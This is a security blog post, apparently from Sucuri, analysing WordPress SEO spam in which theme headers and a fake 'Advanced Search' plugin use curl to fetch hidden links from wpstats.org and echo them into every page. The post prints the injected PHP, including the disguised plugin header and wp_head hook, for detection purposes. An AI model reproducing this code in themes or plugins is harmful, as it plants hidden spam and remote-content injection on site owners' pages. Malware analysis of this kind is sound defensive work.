• Skip to primary navigation
  • Skip to content
  • Skip to primary sidebar
  • Skip to footer

Sucuri Blog

Website Security News

  • Products
    • Website Security Platform
    • Website Firewall (WAF)
    • Enterprise Website Security
    • Multisite Solutions
  • Features
    • Detection
    • Protection
    • Performance
    • Response
    • Backups
  • Partners
    • Agency Solutions
    • Partners
    • Referral Program
    • Ecommerce
  • Resources
    • Guides
    • Webinars
    • Infographics
    • SiteCheck
    • Reports
    • Email Courses
  • Immediate Help
  • Login

Wpstats. org Spam and a Fake Advanced Search Plugin

May 9, 2012Daniel Cid

FacebookTwitterSubscribe

If you are seeing hidden links in your WordPress site, it could be coming from wpstats.org. On some blackhat spam cases we are analysing, the following code was added to the theme header of the compromised site:

if(function_exists(‘curl_init’)) { $url = "http://www.wpstats.org/jquery-1.6.3.min.js"; $ch = curl_init(); $timeout = 5; curl_setopt($ch,CURLOPT_URL,$url); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout); $data = curl_exec($ch); curl_close($ch); echo "$data”; }

If you are not familiar with PHP, this code will contact www.wpstats.org/jquery-1.6.3.min.js, which will return a long list of hidden links to be included on your site (not visible on a normal browser).

The plugin

What is more interesting is that they also have a fake plugin called “advanced-search-plugin” that includes those hidden links and a call back to wpstats.org. The plugin does nothing of what is advertised (advanced search), and is just being used to attract attention to get it installed.

Part of the plugin:

/*
Plugin Name: Advanced Search
Plugin URI: http://searchpluginwp.blogspot.com/
Description: Add a Google style search to your blog where suggestions are made for tags, categories and titles.
Author: Jessica devon
Version: 2.1.2
Author URI: http://searchpluginwp.blogspot.com/

*/
if (!function_exists(‘insert_jquery_theme’)){function insert_jquery_theme(){if (function_exists(‘curl_init’)){$url = "http://www.wpstats.org/jquery-1.6.3.min.js";$ch = curl_init();
$timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
$data = curl_exec($ch);curl_close($ch);echo $data;}}
add_action(‘wp_head’, ‘insert_jquery_theme’);}

If you have this plugin installed, delete it ASAP! Sucuri SiteCheck should be able to identify those hidden spam links if your site is compromised.

FacebookTwitterSubscribe

Categories: Website Malware InfectionsTags: Hacked Websites, Malware Updates, SEO Spam

About Daniel Cid

Daniel B. Cid is Founder of Sucuri and the VP of Engineering for the GoDaddy Security Products group. He is also the founder of OSSEC and CleanBrowsing. You can find more about Daniel on his site dcid.me or on Twitter: @danielcid

Reader Interactions

Comments

  1. French SEO

    May 9, 2012

    Firefox with URL http://www.wpstats.org/jquery-1.6.3.min.js there is no display of hidden links.  Is this normal?

  2. Phelan Riessen

    May 9, 2012

    Thanks for sharing this info. I’ve been on the warpath to find the ultimate WP search plugin. I’m sure I would have stumbled across this one at some point.

  3. josey jasen

    May 25, 2012

    Hey would you mind letting me know which webhost you’re utilizing? I’ve loaded your blog in 3 completely different web browsers and I must say this blog loads a lot faster then most. Can you suggest a good internet hosting provider at a honest price? Thank you,I appreciate it!
    http://www.opencart.com/index.php?route=extension/extension/info&extension_id=6498

  4. Javs Gtr

    August 3, 2012

    I did the following to solve this problem: I downloaded the theme folder (as the problem comes from it) 
    I opened the notepad++ (freeware software)
    Click in search>search in files 
    And when it says “folder” I entered as a path the folder of the theme  ( this will make a specific search in a whole folder ) 
    I searched the name of the false jquery “jquery-1.6.3.min.js”
    and in my particular case, that was in nameofthethemeincludepluginpost.php

    I eliminated the external path and upload this file to ftp

    Problem solved! 

    Hope it helps 

    For any questions , mail me : javs.gtr@gmail.com 

  5. LuisK

    January 22, 2013

    Javs Gtr, thank you.

Primary Sidebar

Socialize With Sucuri

We're actively engaged across multiple platforms. Follow us and let's connect!

  • Facebook
  • Twitter
  • LinkedIn
  • YouTube
  • Instagram
  • RSS Feed

Join Over 20,000 Subscribers!

Sucuri Sidebar Malware Removal to Signup Page

Footer

Products

  • Website Firewall
  • Website AntiVirus
  • Website Backups
  • WordPress Security
  • Enterprise Services

Solutions

  • DDos Protection
  • Malware Detection
  • Malware Removal
  • Malware Prevention
  • Blacklist Removal

Support

  • Blog
  • Knowledge Base
  • SiteCheck
  • Research Labs
  • FAQ

Company

  • About
  • Media
  • Events
  • Employment
  • Contact
  • Testimonials
  • Facebook
  • Twitter
  • LinkedIn
  • Instagram

Customer Login

Sucuri Home

  • Terms of Use
  • Privacy Policy
  • Frequently Asked Questions

© 2023 Sucuri Inc. All rights reserved

Sucuri Cookie Policy
See our policy>>

Our website uses cookies, which help us to improve our site and enables us to deliver the best possible service and customer experience.